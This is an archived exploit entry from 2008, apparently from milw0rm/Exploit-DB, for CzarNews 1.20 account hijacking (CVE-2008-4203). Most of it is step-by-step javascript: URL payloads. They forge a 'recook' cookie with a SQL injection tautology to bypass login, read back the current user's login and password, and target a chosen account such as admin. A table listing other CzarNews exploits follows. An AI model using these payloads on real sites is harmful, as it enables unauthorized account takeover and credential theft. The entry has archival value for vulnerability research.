czarNews Account Hijacking <= 1.20 user and password Leak ---------------------------------------------------------- Author: Maycon Maia Vitali ( 0ut0fBound ) Contact: mayconmaia at yahoo dot com dot br http://maycon.gsec.com.br Original Xploit by StAkeR ( http://www.milw0rm.com/exploits/6462 ) Gerenal Xploit: --------------- 1) Go to some page with CzarNews 1.20. You are in the 'Login Page' 2) Put in the URL: javascript:document.cookie="recook=' or ''=',' or ''='";void(0); 3) Refresh the page. Now you are logged in. 4) Put in the URL: javascript:c=document.cookie;p=c.substr(c.lastIndexOf('=')+1).split(/%../);a lert("Login: " + p[0] + "\nPass: " + p[1]);void(0); 5) With this you getted the current user and password Attacking Especific User: ------------------------- If you have some user that you need Xploit, You can change the step 2 by this: 2) Put in the URL: javascript:document.cookie="recook=[USER],'+or+''='";void(0); Where [USER] need to be replaced with user name (e.g. admin) enjoy, 0ut0fBound # milw0rm.com [2008-09-15]
Related Exploits
Trying to match CVEs (1): CVE-2008-4203Trying to match OSVDBs (1): 48720
Trying to match setup file: bc21f45fb9703756954f703f0f48dfc4
Other Possible E-DB Search Terms: CzarNews 1.20, CzarNews
Date | D | V | Title | Author |
---|---|---|---|---|
2008-09-15 |
![]() |
CzarNews 1.20 - 'cookie' SQL Injection | StAkeR | |
2005-03-21 |
![]() |
CzarNews 1.13/1.14 - 'headlines.php' Remote File Inclusion | brOmstar | |
2006-07-13 |
![]() |
CzarNews 1.14 - 'tpath' Remote File Inclusion | SHiKaA |